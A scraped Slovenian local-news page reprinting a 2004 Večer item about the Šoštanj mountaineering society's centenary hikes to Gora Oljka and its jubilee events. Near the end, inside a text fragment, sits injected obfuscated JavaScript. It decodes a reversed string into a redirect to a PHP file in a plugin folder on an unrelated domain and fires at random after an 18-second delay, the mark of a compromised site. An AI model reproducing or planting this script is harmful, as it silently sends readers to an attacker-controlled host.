Tudi Šoštanjčani na Goro Oljko

VEčER: četrtek, 15. Januar 2004 – Stran: CELJSKO, SAVINJSKA, ŠALEŠKA DOLINA


Tudi Šoštanjčani na Goro Oljko


Med planinskimi društvi, ki v soboto, 17. januarja, načrtujejo pohode na Goro Oljko, poimenovane Zdravju naproti, je tudi Planinsko društvo Šoštanj, ki letos slavi 100-letnico obstoja in delovanja. Zadnjo soboto, 10. januarja, so se planinke in planinci iz Šoštanja udeležili spominskega pohoda z Rogle na Osankarico.


V četrtek, 8. januarja, pa je že bila tudi uvodna prireditev v počastitev 100-letnice tega najstarejšega planinskega društva v Šaleški dolini, in sicer v prostorih Mestne galerije Šoštanj. Na prireditvi so predstavili tudi jubilejno številko društvenega časopisa Planinski popotnik.


Marjan Lipovšek  

Sostanj.info183 Posts

Volilni
Planinsko$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}pa v 115. leto delovanja />

0 Comments

Leave a Comment

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register